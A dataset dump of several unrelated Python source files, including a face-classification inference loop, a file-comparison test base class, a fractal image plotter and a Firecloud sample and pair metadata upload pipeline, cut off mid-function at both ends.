        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        detection = detector.detect(frame)
        # -1 means "no face classified" (no detection, or loop not entered).
        class_img = -1
        face_crops = crop_faces(frame, detection, SCALE)
        infer_time = -1
        for crop_id, crops in enumerate(face_crops):
            #if crop.shape[0] > MIN_CROP_SIZE and crop.shape[1] > MIN_CROP_SIZE:
            # Stack all TTA scales of this face into one batch.
            resized_crop = torch.stack([transforms(crop) for crop in crops])
            infer_time = time.time()
            with torch.no_grad():
                if not args.is_quant:
                    if not args.is_cpu:
                        resized_crop = resized_crop.cuda()
                    res = model(resized_crop)
                else:
                    res = model.dequant(model(model.quant(resized_crop)))
            infer_time = time.time() - infer_time
            res = res.detach().cpu()
            # TTA aggregation
            res, _ = res.max(0)
            if num_classes == 1:
                # Binary head: positive logit -> class 1.
                class_img = int(res > 0)
            else:
                class_img = int(torch.argmax(res, 0))
            if args.dump_images:
                # Undo the [-1, 1] normalization for visual inspection, save as BGR PNG.
                crop = (((resized_crop[-1].permute(1,2,0) + 1) / 2) * 255).cpu().numpy().astype(np.uint8)
                cv2.imwrite(str(output_path / f'class_{class_img}_file_{file_id}.png'),
                            cv2.cvtColor(crop, cv2.COLOR_RGB2BGR))
            # NOTE(review): only the first detected face is classified per image.
            break
        print('result', (filename, class_img), 'classifier time', infer_time, 'ms')
        result.append((filename, class_img))
    # Write one "path,class" line per image.
    with open(args.output_data, 'w') as f:
        for path, class_id in result:
            f.write(f'{path},{class_id}\n')
|
991,482 | 435f0edf22db434c748a323ee62e5e9b46a140c2 | # -*- coding: utf-8 -*-
# Copyright (c) 2015-2019 Jan-Philip Gehrcke. See LICENSE file for details.
from __future__ import unicode_literals
from unittest import TestCase
from distutils import dir_util, file_util
from inspect import currentframe
import os
test_data_folder_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "test_data")
class TestBase(TestCase):
    """Base class for file-comparison tests.

    Provides class-level path setup for generated output (LaTeX/HTML) and
    expected fixtures, byte-wise file comparison with failure artifacts copied
    to a `_failed` folder, and output cleanup after each test.
    """

    @classmethod
    def setup_class(cls):
        # Paths of generated output under test_data/_output (LaTeX + HTML).
        cls.output_folder_path = os.path.join(test_data_folder_path, "_output")
        cls.output_latex_folder_path = os.path.join(cls.output_folder_path, "latex")
        cls.output_latex_body_file_path = os.path.join(cls.output_latex_folder_path, "latex-body.tex")
        cls.output_latex_document_file_path = os.path.join(cls.output_latex_folder_path, "latex-document.tex")
        cls.output_html_folder_path = os.path.join(cls.output_folder_path, "html")
        cls.output_html_index_file_path = os.path.join(cls.output_html_folder_path, "index.html")
        # Mismatching files are copied here for post-mortem inspection.
        cls.failure_folder_path = os.path.join(test_data_folder_path, "_failed")
        # dir_util.remove_tree(cls.failure_folder_path)  # TODO remove only once before all test

    @classmethod
    def set_paths(cls, test_folder_path):
        """Point the class at one test case folder (its src/ input and expected/ fixtures)."""
        cls.test_folder_path = test_folder_path
        cls.input_folder_path = os.path.join(test_folder_path, "src")
        cls.setup_file_path = os.path.join(cls.input_folder_path, "setup.toml")
        cls.input_file_path = os.path.join(cls.input_folder_path, "textstory.txt")
        cls.expected_folder_path = os.path.join(cls.test_folder_path, "expected")
        cls.expected_latex_folder_path = os.path.join(cls.expected_folder_path, "latex")
        cls.expected_latex_body_file_path = os.path.join(cls.expected_latex_folder_path, "latex-body.tex")
        cls.expected_latex_document_file_path = os.path.join(cls.expected_latex_folder_path, "latex-document.tex")
        cls.expected_html_folder_path = os.path.join(cls.expected_folder_path, "html")
        cls.expected_html_index_file_path = os.path.join(cls.expected_html_folder_path, "index.html")

    @classmethod
    def read_file(cls, file_path):
        """Return the raw bytes of *file_path* (binary read avoids newline translation)."""
        with open(file_path, "rb") as f:
            file_content = f.read()
        return file_content

    def compare_file_contents(self, expected_file_path, actual_file_path):
        """Assert two files are byte-identical.

        On mismatch, both files are copied into the failure folder, prefixed
        with the *caller's* test method name (taken from the caller frame via
        ``currentframe().f_back`` — do not add an intermediate call level).
        """
        # Compare LaTeX body with expected
        first_file = self.read_file(expected_file_path)
        second_file = self.read_file(actual_file_path)
        if first_file != second_file:
            dir_util.mkpath(self.failure_folder_path)
            split = os.path.split(expected_file_path)
            # Name of the calling test function, used to label failure artifacts.
            failure_file_prefix = currentframe().f_back.f_code.co_name
            first_fail_path = os.path.join(self.failure_folder_path, failure_file_prefix + "_expected_" + split[len(split) - 1])
            file_util.copy_file(expected_file_path, first_fail_path, update=1)
            split = os.path.split(actual_file_path)
            second_fail_path = os.path.join(self.failure_folder_path, failure_file_prefix + "_actual_" + split[len(split) - 1])
            file_util.copy_file(actual_file_path, second_fail_path, update=1)
            self.fail("{0} does not match {1}".format(expected_file_path, actual_file_path))

    def tearDown(self):
        # Cleanup: remove generated output so the next test starts clean.
        if os.path.exists(self.output_folder_path):
            dir_util.remove_tree(self.output_folder_path)
|
991,483 | 870b7b588cc3df622e09b6d7f12882a7304daac2 | #!/usr/bin/env python2
import signal
import logging
from programs import Program
from switches.base import SwitchProxy
from writer.base import WriterProxy
from manager.base import ManagerProxy
from misc.autobahnWebSocketBase import WebSocketBase
from conf.private import writer, switches, manager, switch_programs_file
LOG_FORMAT = '%(asctime)s - %(levelname)-8s %(message)s'
logging.basicConfig(format=LOG_FORMAT, level='DEBUG', filename="angezeige.log")
def main():
    """Start the writer/switch/manager proxies and the WebSocket reactor,
    then run until interrupted (SIGINT triggers an orderly shutdown)."""

    def cleanup_exit(*args, **kwargs):
        # Shut everything down (program, proxies, reactor) and terminate.
        print("\nBye!")
        Program.stop()
        switch_proxy.disable()
        writer_proxy.disable()
        manager_proxy.disable()
        WebSocketBase.stop_reactor()
        exit()

    # Register the SIGINT handler before bringing up any component.
    signal.signal(signal.SIGINT, cleanup_exit)

    writer_proxy = WriterProxy(items=writer)
    switch_proxy = SwitchProxy(items=switches, switch_programs_file=switch_programs_file)
    manager_proxy = ManagerProxy(items=manager)

    # Start first program in circle
    writer_proxy.enable()
    switch_proxy.enable()
    WebSocketBase.start_reactor()
    switch_proxy.next()

    # is blocking if urwid enabled
    # urwid has to be run in the main thread
    manager_proxy.enable()

    if not manager_proxy.is_urwid_enabled():
        # Without urwid, block here until a signal arrives, then tear down.
        signal.pause()
        cleanup_exit()


if __name__ == "__main__":
    main()
|
991,484 | cf8834e562f4f498e29c5c398ca7dbf0dfd941c4 | # -*- coding: utf-8 -*-
"""Main module."""
def simpleAddition(num1, num2):
    """Return the sum of *num1* and *num2*."""
    total = num1 + num2
    return total
991,485 | f02f427e11a1843917f3a40d28a9e5f8101819f7 | #run this by 'python3 manage.py runscript load_from_csv
import csv
from majorApp.models import News
def run():
    """Reload the News table from data/test_data.csv.

    Deletes every existing News row, then inserts one News per CSV row
    using columns 0 (title), 1 (url), 2 (time) and 6 (label).
    Invoke with: python3 manage.py runscript load_from_csv
    """
    # Fix: the original opened the file without ever closing it; the
    # context manager guarantees the handle is released.
    with open('data/test_data.csv') as fhand:
        reader = csv.reader(fhand)
        News.objects.all().delete()
        for row in reader:
            print(row)
            news = News(title_text=row[0], url=row[1], time=row[2], label=row[6])
            news.save()
991,486 | 6cd7ad096e1abb15a2bac8ecdbb0fc47cce70b47 | from datetime import datetime
def list_to_json(book_list):
    """Serialize *book_list* into the legacy '{"book_list": {...}}' wrapper.

    Every book contributes a '"book": <json>' fragment (via book.to_json());
    fragments are joined with ', ' inside the wrapper object. An empty list
    yields '{"book_list": {}}'.
    """
    fragments = ['"book": ' + book.to_json() for book in book_list]
    return '{"book_list": {' + ', '.join(fragments) + '}}'
def save_json(json):
    """Write *json* text to result/<timestamp>.json (UTF-8).

    Fixes two defects of the original:
    - the path was built as "result\\<ts>.json" with a literal backslash,
      which on POSIX systems created a file literally named 'result\\...'
      in the CWD instead of a file inside the result directory; os.path.join
      builds the correct platform path and the directory is created if missing;
    - the explicit try/finally f.close() inside the `with` block was
      redundant (the context manager already closes the handle).
    """
    import os
    dt_str = datetime.now().strftime("%Y-%m-%d_%H%M%S")
    os.makedirs("result", exist_ok=True)
    path = os.path.join("result", dt_str + ".json")
    with open(path, 'w', encoding='utf-8', newline='') as f:
        f.write(json)
991,487 | 4be33ec39fb8e3ff4d5245d7b000400858826274 | #!/usr/bin/python
# Plot an image from a CSV file. xpix, ypix, iter.
# JM Wed 22 Nov 2017 21:39:59 GMT
import csv
from PIL import Image
from timeit import default_timer as timer
from lc import colour_list
import sys
import os
# Python 2 script: render a fractal-style image from a CSV of (x, y, iter) rows.
start = timer()
# Number of available colours; iteration counts are wrapped modulo this.
lenlc = len( colour_list )
# Colour-cycle offset used only in the output filename (and the dead code below).
rnum = 93
maxiter = 150
white = (255,255,255)
#randcolour = ( 135,206,250)
randcolour = ( 255,255,250)
# CSV path comes from the command line; first row holds the image dimensions.
fname = sys.argv[ 1 ]
with open( fname ) as f:
    reader = csv.reader(f)
    row1 = next(reader)
    print 'Row1:', row1
    X_SIZE = row1[ 0 ]
    Y_SIZE = row1[ 1 ]
    X_SIZE = int( X_SIZE )
    Y_SIZE = int( Y_SIZE )
    print 'X_SIZE: ', X_SIZE
    print 'Y_SIZE: ', Y_SIZE
    # Blank white canvas; every remaining CSV row paints one pixel.
    img = Image.new( "RGB", [ X_SIZE, Y_SIZE ], white )
    for row in reader:
        #print 'Row:', row
        x_pixel = int( row[ 0 ] )
        y_pixel = int( row[ 1 ] )
        iter_count = int( row[ 2 ] )
        # Map the iteration count onto the palette, wrapping around.
        mycolour = colour_list[ iter_count % lenlc ]
        #mycolour = ( 13 * iter_count, 23 * iter_count, 33 * iter_count )
        img.putpixel( ( x_pixel, y_pixel ), mycolour )
        # Dead code kept as a string literal: an alternative colouring scheme
        # using rnum/maxiter/randcolour.
        '''
        if ( iter_count + rnum >= lenlc ):
            mycolour = colour_list[ iter_count % lenlc ]
        else:
            mycolour = colour_list[ iter_count + rnum ]
        if ( iter_count <= 2 ):
            img.putpixel( ( x_pixel, y_pixel ), white )
        elif ( iter_count == maxiter ):
            img.putpixel( ( x_pixel, y_pixel ), randcolour )
        else:
            img.putpixel( ( x_pixel, y_pixel ), mycolour )
        '''
# Report elapsed time and derive an output name '<input>_<rnum>.png'.
dt = timer() - start
out_fname, file_extension = os.path.splitext( fname )
print 'Test plot from CSV created in %f s' % dt
print 'OFa:', out_fname, ' EXT:', file_extension
out_fname = out_fname + '_' + str( rnum ) + '.png'
print 'OFb:', out_fname
# Only display the image; saving is disabled.
img.show()
#img.save( out_fname )
|
991,488 | c11bf33e1d0daa539d6cf6a0e2e5a8cdda1e39a7 | import os
import re
import pandas as pd
import numpy as np
from firecloud import api as firecloud_api
import datetime
import glob
"""
_____ ___ ____ _____ ____ _ ___ _ _ ____ ____ _ _ ____ _ ____
| ___|_ _| _ \| ____/ ___| | / _ \| | | | _ \ / ___|| | | |/ ___| / \ | _ \
| |_ | || |_) | _|| | | | | | | | | | | | | | \___ \| | | | | _ / _ \ | |_) |
| _| | || _ <| |__| |___| |__| |_| | |_| | |_| | ___) | |_| | |_| |/ ___ \| _ <
|_| |___|_| \_\_____\____|_____\___/ \___/|____/ |____/ \___/ \____/_/ \_\_| \_\
"""
"""
INSTRUCTIONS:
FILES TO UPDATE PRIOR TO RUNNING:
cohort_files/bsp_latest_all_samples_ --> REPLACE WITH LATEST BSP SPREADSHEET
remote_files/ --> ALL THE FILES HERE
walkupseqfiles/ --> ALL FILES HERE AND COMBINE
"""
########################################################
# Sample functions
########################################################
def get_samples(paths_to_batches_info, google_bucket_id, sublist=None):
    """Compile the sample table across batches.

    Args:
        paths_to_batches_info: .xlsx file whose rows (indexed by tsca_id)
            carry a `path_to_samples_info` column.
        google_bucket_id: bucket id used to build gs:// paths.
        sublist: optional list of tsca_ids; when given, only those batches
            are compiled.
    Returns:
        One DataFrame with every batch's samples, joined (left) against the
        cohort-code dictionary on `Collection`.
    """
    batch_paths = pd.read_excel(paths_to_batches_info, index_col=0)
    frames = []
    for tsca_id, batch_row in batch_paths.iterrows():
        # Honor the optional batch whitelist.
        if sublist is not None and tsca_id not in sublist:
            continue
        # Make data Firecloud-compatible.
        frames.append(prepare_batch_samples_for_metadata_export(
            batch_row.path_to_samples_info, tsca_id, google_bucket_id))
    combined = pd.concat(frames, axis=0)
    # Attach short cohort codes via the Collection name.
    cohort_names = pd.read_table('cohort_files/cohort_names_dictionary.txt',
                                 header=None, names=['Collection', 'cohort_code'])
    return pd.merge(combined, cohort_names, on='Collection', how='left')
def add_cohort_to_old_batches(all_samples):
    """
    Older batches didn't come with the Collection attribute, so it must be added.
    Args:
        - all_samples: all samples, without cohort data
    Returns:
        - all_samples with `cohort_code` and `Collection` filled in where the
          BSP spreadsheet knows the sample.
    """
    # Retrieve list of samples with corresponding cohort from bsp.broadinstitute.org
    samples_with_cohort = pd.read_excel('cohort_files/bsp_latest_all_samples_TSCA22.xls')
    # Add column for join
    samples_with_cohort['bsp_sample_id_validation'] = samples_with_cohort['Sample ID']
    # FC doesn't accept cohort names with non-alphanumeric characters, so use cohort codes instead
    # Load dictionary of {long cohort name : short cohort code}
    cohort_formatted_names = pd.read_table('cohort_files/cohort_names_dictionary.txt', header=None, names=['Collection', 'cohort_code'])
    # Add cohort codes to samples_with_cohort
    samples_with_cohort = pd.merge(samples_with_cohort, cohort_formatted_names, on='Collection', how='inner')
    # Add cohort data to all samples. Because all_samples may already carry
    # cohort_code/Collection columns, the merge creates _x/_y suffixed pairs.
    data = pd.merge(all_samples, samples_with_cohort[['bsp_sample_id_validation', 'cohort_code', 'Collection']], \
                    on='bsp_sample_id_validation', \
                    how='left')
    # Merge two `Collection` columns created: wherever one side is null,
    # take the other side's value, then drop the suffixed columns.
    data.loc[pd.isnull(data['cohort_code_x']), 'cohort_code'] = data.loc[pd.isnull(data['cohort_code_x']), 'cohort_code_y']
    data.loc[pd.isnull(data['cohort_code_y']), 'cohort_code'] = data.loc[pd.isnull(data['cohort_code_y']), 'cohort_code_x']
    data.loc[pd.isnull(data['Collection_x']), 'Collection'] = data.loc[pd.isnull(data['Collection_x']), 'Collection_y']
    data.loc[pd.isnull(data['Collection_y']), 'Collection'] = data.loc[pd.isnull(data['Collection_y']), 'Collection_x']
    # NOTE(review): when both _x and _y are non-null the merged column keeps
    # whichever assignment ran last — confirm that is the intended precedence.
    data = data.drop(['cohort_code_x', 'cohort_code_y'], axis=1)
    data = data.drop(['Collection_x', 'Collection_y'], axis=1)
    return data
def prepare_batch_samples_for_metadata_export(path_to_samples_info, tsca_id, google_bucket_id):
    """Build the Firecloud sample-metadata table for one batch.

    Args:
        path_to_samples_info: path to the {}.import_samples.txt file.
        tsca_id: batch id (TSCAXX).
        google_bucket_id: bucket id ('gs://<google_bucket_id>').
    Returns:
        DataFrame with FC-compatible column names, gs:// BAM/BAI locations
        and the batch's tsca_id, with 'entity:sample_id' as first column.
    """
    samples = pd.read_table(path_to_samples_info)
    # Firecloud column naming.
    samples = samples.rename(columns={'sample_id': 'entity:sample_id',
                                      'individual_id': 'participant_id'})
    # Bucket prefix where this batch's BAMs live.
    bucket_prefix = "gs://%s/seq_data/%s" % (google_bucket_id, tsca_id)
    # BAM basename, and the matching .bai name (swap the trailing 'bam').
    samples['bam_filename'] = samples['clean_bam_file_capture'].apply(lambda p: p.split('/')[-1])
    samples['bai_filename'] = samples['bam_filename'].apply(lambda name: "%s%s" % (name[:-3], 'bai'))
    # Rewrite the BAM path from the local filesystem to the bucket, and add
    # the sibling BAI path.
    samples['clean_bam_file_capture'] = samples.apply(
        lambda row: "%s/%s/%s" % (bucket_prefix, row['external_id_validation'], row['bam_filename']), axis=1)
    samples['clean_bai_file_capture'] = samples.apply(
        lambda row: "%s/%s/%s" % (bucket_prefix, row['external_id_validation'], row['bai_filename']), axis=1)
    samples['tsca_id'] = tsca_id
    # entity:sample_id must come first for FC import.
    ordered = ['entity:sample_id'] + [col for col in samples if col != 'entity:sample_id']
    return samples[ordered]
def save_and_upload_samples(data, namespace, workspace, tsca_id):
    """Write the FC sample-import TSV for a batch and upload it.

    Args:
        - data: samples df (as produced by prepare_batch_samples_for_metadata_export)
        - namespace, workspace: Firecloud destination
        - tsca_id: batch id, used as output folder and in the filename
    Writes:
        - {tsca_id}/fc_upload_samples_tsca_{tsca_id}.txt
    Returns:
        - response from upload_entities_from_tsv
    """
    # os.makedirs replaces the shell call `os.system('mkdir -p ...')`
    # (no subshell, works on all platforms, raises on real errors).
    os.makedirs(tsca_id, exist_ok=True)
    filename = '%s/fc_upload_samples_tsca_%s.txt' % (tsca_id, tsca_id)
    data.to_csv(filename, sep='\t', index=False)
    res = upload_entities_from_tsv(namespace, workspace, filename)
    return res
########################################################
# Pairs functions
########################################################
def create_pairs_list(all_samples):
    """Creates DF with pairs for firecloud metadata export.

    For every tumor sample, emits two rows: a tumor-normal pair (match_type
    'tumor_normal') and a tumor-primary pair (match_type 'tumor_primary').
    When no match is found the control columns are the string "NA".
    Args:
        - all_samples: all samples.
    Returns:
        - DataFrame with one row per (tumor sample x pair kind).
    """
    dfs = []
    # Find match normals for tumor samples only
    tumor_samples = all_samples[all_samples.sample_type=="Tumor"]
    # Running row index for the per-pair one-row DataFrames below.
    i = 0
    for index, row in tumor_samples.iterrows():
        # Find all samples from same individual (same individual_id, different sample_id)
        patient_samples = all_samples[ (all_samples['participant_id'] == row['participant_id']) \
                                       & (all_samples['entity:sample_id'] != row['entity:sample_id']) ]
        # NOTE: If more than one match tumor tissue or match normal found, select first one found.
        # The match normal is used to compute allelic fractions in Mutect2, so for now we ignore the conditions it workspaces grown in.
        ######## Match normal: Add match normal
        match_normal = patient_samples[ patient_samples['sample_type'] == "Normal"]
        # > No match normal found
        if match_normal.empty:
            control_sample_id = "NA"
            control_sample_tsca_id = "NA"
        # > Match normal found (this elif is always true when reached: not empty
        #   implies shape[0] > 0).
        elif match_normal.shape[0] > 0:
            match_normal = match_normal.iloc[0]
            control_sample_id = match_normal['entity:sample_id']
            control_sample_tsca_id = match_normal['tsca_id']
        # Create DF with Tumor/Normal pair set
        pair_id = "%s_%s_TN" % (row['entity:sample_id'], control_sample_id)
        df_dict = {'entity:pair_id': pair_id, 'case_sample_id': row['entity:sample_id'], \
                   'control_sample_id': control_sample_id, 'participant_id': row['participant_id'], 'match_type': 'tumor_normal', \
                   'case_sample_tsca_id': row['tsca_id'], 'control_sample_tsca_id': control_sample_tsca_id}
        dfs.append(pd.DataFrame(df_dict, index=[i], columns=df_dict.keys()))
        i+=1
        ######## Tumor tissue: Add primary tumor tissue
        # Primary tissue is recognized by substring match on the external id.
        match_primary_tumor = patient_samples[ ( patient_samples['external_id_validation'].str.contains('primary|prim|tissue|tiss|Primary|Tissue') ) & \
                                               (patient_samples['sample_type'] == "Tumor")]
        # > No primary tumor tissue found
        if match_primary_tumor.empty:
            control_sample_id = "NA"
            control_sample_tsca_id = "NA"
        # > Sample itself is a primary tumor tissue: do not pair it with another one.
        elif any(substring in row['external_id_validation'] for substring in ['primary', 'prim', 'tissue', 'tiss', 'Primary', 'Tissue']):
            control_sample_id = "NA"
            control_sample_tsca_id = "NA"
        # > Tumor tissue found
        elif match_primary_tumor.shape[0] > 0:
            match_primary_tumor = match_primary_tumor.iloc[0]
            control_sample_id = match_primary_tumor['entity:sample_id']
            control_sample_tsca_id = match_primary_tumor['tsca_id']
        # Create DF with Tumor/Primary pair set
        pair_id = "%s_%s_TP" % (row['entity:sample_id'], control_sample_id)
        df_dict = {'entity:pair_id': pair_id, 'case_sample_id': row['entity:sample_id'], \
                   'control_sample_id': control_sample_id, 'participant_id': row['participant_id'], 'match_type': 'tumor_primary', \
                   'case_sample_tsca_id': row['tsca_id'], 'control_sample_tsca_id': control_sample_tsca_id}
        dfs.append(pd.DataFrame(df_dict, index=[i], columns=df_dict.keys()))
        i+=1
    return pd.concat(dfs, axis=0)
def save_and_upload_pairs(namespace, workspace, pairs, blacklist=[]):
    """Update all pairs in Firecloud.

    NOTE: All pairs need to be updated with every new batch, as it may contain
    match normals or primary matches for previous batches.
    Args:
        - pairs: df of all pairs, as created by create_pairs_list
        - blacklist: case sample ids to exclude from the upload
    Returns:
        - res: json response from http request
    Creates:
        - ./Pairs/fc_upload_pairs.txt file
    """
    pairs = pairs[~pairs['case_sample_id'].isin(blacklist)]
    # os.makedirs replaces the shell `mkdir -p` call.
    os.makedirs('Pairs', exist_ok=True)
    filename = './Pairs/fc_upload_pairs.txt'
    # Fix: pass the separator by keyword — recent pandas rejects it positionally.
    pairs.to_csv(filename, sep='\t', index=False)
    res = upload_entities_from_tsv(namespace, workspace, filename)
    return res
########################################################
# Pair set functions
########################################################
def prepare_batch_pairsets_for_metadata_export(all_samples, pairs, tsca_id):
    """Build the batch's FC pair sets (tumor-normal and tumor-primary).

    Args:
        all_samples: all samples.
        pairs: pairs df as created by create_pairs_list.
        tsca_id: batch id; only pairs whose case sample is in this batch are kept.
    Returns:
        Tuple of DataFrames: (tumor-normal pair set, tumor-primary pair set),
        with set ids '<tsca_id>_TN' / '<tsca_id>_TP'.
    """
    sample_ids = all_samples[['entity:sample_id', 'tsca_id']]

    def build_pairset(match_type, suffix):
        # Pairs of the requested kind whose case sample belongs to this batch,
        # joined against the sample table to recover the batch id column.
        subset = pairs[(pairs['match_type'] == match_type) & (pairs['case_sample_tsca_id'] == tsca_id)]
        merged = pd.merge(subset, sample_ids,
                          left_on='case_sample_id', right_on='entity:sample_id',
                          how='inner')[['tsca_id', 'entity:pair_id']]
        merged = merged.rename(columns={'tsca_id': 'membership:pair_set_id',
                                        'entity:pair_id': 'pair_id'})
        # Tag the set id with the pair kind.
        merged['membership:pair_set_id'] = merged['membership:pair_set_id'].apply(
            lambda x: "%s_%s" % (x, suffix))
        return merged

    return (build_pairset("tumor_normal", "TN"), build_pairset("tumor_primary", "TP"))
def prepare_cumulative_pairsets_for_metadata_export(pairs, name):
    """Build cumulative (all-batches) FC pair sets.

    Args:
        pairs: pairs df as created by create_pairs_list.
        name: label embedded in the set id, usually the current TSCA id.
    Returns:
        Tuple of DataFrames (tumor-normal, tumor-primary) with set ids
        'Cum_TN_<name>_all' / 'Cum_TP_<name>_all'.
    """
    def cumulative(match_type, tag):
        subset = pairs.loc[pairs['match_type'] == match_type, ["entity:pair_id"]]
        subset = subset.rename(columns={"entity:pair_id": "pair"})
        subset['membership:pair_set_id'] = "Cum_%s_%s_all" % (tag, name)
        return subset[['membership:pair_set_id', 'pair']]

    return cumulative("tumor_normal", "TN"), cumulative("tumor_primary", "TP")
def upload_pairsets(namespace, workspace, pairsets, pairset_type):
    """Write a pair-set TSV and upload it to Firecloud.

    Args:
        - pairsets: pair-set df (membership:pair_set_id / pair columns)
        - pairset_type: label used in the output filename (e.g. 'TN', 'TP')
    Returns:
        - response from upload_entities_from_tsv
    """
    # os.makedirs replaces the shell `mkdir -p` call.
    os.makedirs('Pairs', exist_ok=True)
    filename = './Pairs/fc_upload_pairsets_%s.txt' % pairset_type
    # Fix: pass the separator by keyword — recent pandas rejects it positionally.
    pairsets.to_csv(filename, sep='\t', index=False)
    res = upload_entities_from_tsv(namespace, workspace, filename)
    return res
###############################################
# Participant functions
###############################################
def prepare_participants_for_metadata_export(path_to_samples_info, tsca_id):
    """Build the participant entity table for Firecloud.

    Participants must exist in FC before their samples can be uploaded.
    Args:
        path_to_samples_info: batch sample-info file (tab-separated).
        tsca_id: batch id (unused here, kept for a uniform call signature).
    Returns:
        DataFrame with a single 'entity:participant_id' column, one row per
        distinct individual.
    """
    frame = pd.read_table(path_to_samples_info)
    print( "%d Participants in this batch" % frame['individual_id'].unique().shape[0] )
    unique_individuals = frame.individual_id.drop_duplicates()
    return pd.DataFrame(unique_individuals).rename(
        columns={'individual_id': 'entity:participant_id'})
def save_and_upload_participants(data, namespace, workspace, tsca_id):
    """Write the FC participant-import TSV for a batch and upload it.

    Args:
        - data: participants df (entity:participant_id column)
    Writes:
        - {tsca_id}/fc_upload_patients_{tsca_id}.txt
    Returns:
        - response from upload_entities_from_tsv
    """
    # os.makedirs replaces the shell `mkdir -p` call.
    os.makedirs(tsca_id, exist_ok=True)
    filename = './%s/fc_upload_patients_%s.txt' % (tsca_id, tsca_id)
    # Fix: pass the separator by keyword — recent pandas rejects it positionally.
    data.to_csv(filename, sep='\t', index=False)
    res = upload_entities_from_tsv(namespace, workspace, filename)
    return res
########################################################
# Sample set functions
########################################################
def prepare_batch_sample_set_for_metadata_export(path, tsca_id):
    """Build the three per-batch FC sample sets: all, tumors, normals.

    Args:
        path: path to the {}.import_samples.txt file.
        tsca_id: batch id; set ids are '<tsca_id>', '<tsca_id>_T', '<tsca_id>_N'.
    Returns:
        Tuple (all_samples, tumors, normals) of membership DataFrames.
    """
    batch = pd.read_table(path)
    print( "%d Samples in this batch" % batch.shape[0] )
    # Every sample belongs to the whole-batch set named <tsca_id>.
    set_column = pd.DataFrame(index=batch.index,
                              columns=['membership:sample_set_id'], data=tsca_id)
    all_samples = pd.concat([set_column, batch[['sample_id', 'sample_type']]], axis=1)

    def typed_subset(sample_type, suffix):
        # Samples of one type, re-labelled with the suffixed set id.
        selected = all_samples.loc[all_samples['sample_type'] == sample_type,
                                   ['membership:sample_set_id', 'sample_id']].copy()
        selected['membership:sample_set_id'] = "%s_%s" % (tsca_id, suffix)
        return selected

    tumors = typed_subset("Tumor", "T")
    normals = typed_subset("Normal", "N")
    return (all_samples.drop('sample_type', axis=1), tumors, normals)
def filter_existing_samples(df, sample_id_colname, remote_samples):
    """Drop rows whose sample id already exists remotely in Firecloud.

    Re-uploading a sample set would otherwise duplicate samples, so rows
    already present remotely are removed before upload.
    Args:
        df: dataframe to filter.
        sample_id_colname: name of the column holding the sample id.
        remote_samples: FC download with an 'entity:sample_id' column.
    Returns:
        df restricted to rows not present remotely.
    """
    existing_ids = set(remote_samples['entity:sample_id'].tolist())
    keep_mask = ~df[sample_id_colname].isin(existing_ids)
    return df[keep_mask]
def save_and_upload_batch_sample_sets(batch_samples, batch_tumors, batch_normals, tsca_id, namespace, workspace):
    """Write the three batch sample-set TSVs (all/tumors/normals) and upload each.

    Args:
        - batch_samples, batch_tumors, batch_normals: membership dfs from
          prepare_batch_sample_set_for_metadata_export
        - tsca_id: batch id, used as output folder and in filenames
    Returns:
        - tuple of the three upload responses (all, tumors, normals)
    """
    # os.makedirs replaces the shell `mkdir -p` call.
    os.makedirs(tsca_id, exist_ok=True)
    batch_samples_filename = './%s/fc_upload_sample_set_tsca_%s.txt' % (tsca_id, tsca_id)
    batch_tumors_filename = './%s/fc_upload_sample_set_tsca_%s_tumors.txt' % (tsca_id, tsca_id)
    batch_normals_filename = './%s/fc_upload_sample_set_tsca_%s_normals.txt' % (tsca_id, tsca_id)
    batch_samples.to_csv(batch_samples_filename, sep="\t", index=False)
    batch_tumors.to_csv(batch_tumors_filename, sep="\t", index=False)
    batch_normals.to_csv(batch_normals_filename, sep="\t", index=False)
    r1 = upload_entities_from_tsv(namespace, workspace, batch_samples_filename)
    r2 = upload_entities_from_tsv(namespace, workspace, batch_tumors_filename)
    r3 = upload_entities_from_tsv(namespace, workspace, batch_normals_filename)
    return (r1, r2, r3)
########################################################
# Cohort functions
########################################################
def prepare_cohorts_for_metadata_export(all_samples, blacklist=[]):
    """Build cohort sample sets for Firecloud export.

    Args:
        all_samples: samples with a 'cohort_code' column.
        blacklist: sample ids to exclude. (Shared mutable default is safe
        here: the list is only read, never mutated.)
    Returns:
        DataFrame with ['membership:sample_set_id', 'sample_id'] mapping each
        sample to its cohort set.
    """
    renamed = all_samples.rename(columns={'cohort_code': 'membership:sample_set_id',
                                          'entity:sample_id': 'sample_id'})
    cohorts = renamed[['membership:sample_set_id', 'sample_id']]
    # Drop blacklisted samples.
    return cohorts[~cohorts['sample_id'].isin(blacklist)]
def save_and_upload_cohorts(data, latest_tsca_id, namespace, workspace):
    """Write the cohort sample-set TSV and upload it to Firecloud.

    Args:
        - data: cohort membership df (from prepare_cohorts_for_metadata_export)
        - latest_tsca_id: tag embedded in the output filename
    Returns:
        - response from upload_entities_from_tsv
    """
    # Fix: ensure the output directory exists — the original assumed
    # cohort_files/ was already present and failed otherwise.
    os.makedirs('cohort_files', exist_ok=True)
    filename = 'cohort_files/fc_upload_sample_set_cohorts_%s.txt' % latest_tsca_id
    data.to_csv(filename, index=False, sep="\t")
    res = upload_entities_from_tsv(namespace, workspace, filename)
    return res
def prepare_cohort_pairsets_for_metadata_exports(latest_tsca_id, pairs, all_samples, blacklist=[]):
    """Build cohort pair sets, used for per-cohort SNV reports.

    Args:
        latest_tsca_id: accepted for call-site compatibility; not used here.
        pairs: pair list (create_pairs_list output).
        all_samples: samples with a 'cohort_code' column.
        blacklist: case sample ids to exclude.
    Returns:
        DataFrame with ['membership:pair_set_id' (cohort code), 'pair_id'].
    """
    usable = pairs[~pairs['case_sample_id'].isin(blacklist)]
    # Cohort reports are built from tumor-normal pairs only.
    usable = usable[usable["match_type"] == "tumor_normal"]
    # Attach each pair's cohort via its case sample.
    with_cohort = pd.merge(usable, all_samples[['entity:sample_id', 'cohort_code']],
                           left_on='case_sample_id', right_on='entity:sample_id')
    result = with_cohort[['cohort_code', 'entity:pair_id']]
    return result.rename(columns={'entity:pair_id': 'pair_id',
                                  'cohort_code': 'membership:pair_set_id'})
def save_and_upload_cohort_pairsets(namespace, workspace, pairsets):
    """Write the cohort pair-set TSV and upload it to Firecloud.

    Args:
        - pairsets: cohort pair-set df (membership:pair_set_id / pair_id columns)
    Returns:
        - response from upload_entities_from_tsv
    """
    # os.makedirs replaces the shell `mkdir -p` call.
    os.makedirs('Pairs', exist_ok=True)
    filename = './Pairs/fc_upload_cohort_pairsets.txt'
    # Fix: pass the separator by keyword — recent pandas rejects it positionally.
